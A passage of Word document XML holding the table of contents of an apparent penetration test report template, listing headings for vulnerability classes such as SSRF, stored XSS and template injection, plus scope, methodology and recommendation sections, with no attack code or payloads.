            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Vulnerability Statement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811462 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18FFB8F3" w14:textId="73E90EC3"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63" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Threat Statement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811463 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2566FD2C" w14:textId="3E0865E2"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4" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 Server-side request forgery</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811464 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B0B51FB" w14:textId="2B81A27A"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5" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 Identification and Authentication Failure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811465 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C54F195" w14:textId="4BFC4EAB"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6" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3 Use of Hardcoded Credentials</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811466 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61C4D471" w14:textId="4CA05B42"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7" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.4 Unrestricted File Upload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811467 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5716E1DE" w14:textId="443463DE"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8" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.5 Stored Cross-Site Scripting (XSS)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811468 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23E3F44A" w14:textId="67DE2CFD"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69" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.6 Template Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811469 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B1F9146" w14:textId="71476E94"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70" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.  Risk Assessment Results</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811470 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="051514D5" w14:textId="6C7D2F16"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71" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>EXECUTIVE SUMMARY</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811471 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14CCE029" w14:textId="03791331"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72" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>&lt;Optional - Big Issue&gt; Recommendation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811472 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12C041E4" w14:textId="35AAF8DF"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73" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>HIGH LEVEL ASSESSMENT OVERVIEW</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811473 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74AC75C2" w14:textId="3A976954"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74" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Observed Security Strengths</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811474 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="172E7A95" w14:textId="5A1998D5"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75" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Areas for Improvement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811475 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D215734" w14:textId="2E28B983" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc155811476" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Short Term Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811476 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="331B651F" w14:textId="1CC8C880" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc155811477" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Long Term Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811477 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D031A39" w14:textId="3E910C75"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78" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SCOPE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811478 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B11CCE2" w14:textId="222BBF1B"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79" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Networks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811479 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34EDBB37" w14:textId="130D60B4"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0" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Other</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811480 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F3400E7" w14:textId="54CD234D"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1" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Provided Credentials</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811481 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2913622E" w14:textId="379B9AFD"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82" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TESTING METHODOLOGY</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811482 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E10C31">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67AA4464" w14:textId="72007FBC"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83" w:history="1">
            <w:r w:rsidRPr="00250467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CLASSIFICATION DEFINITIONS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc155811483 \h </w:instrText>
            </w:r>
            <w:r>
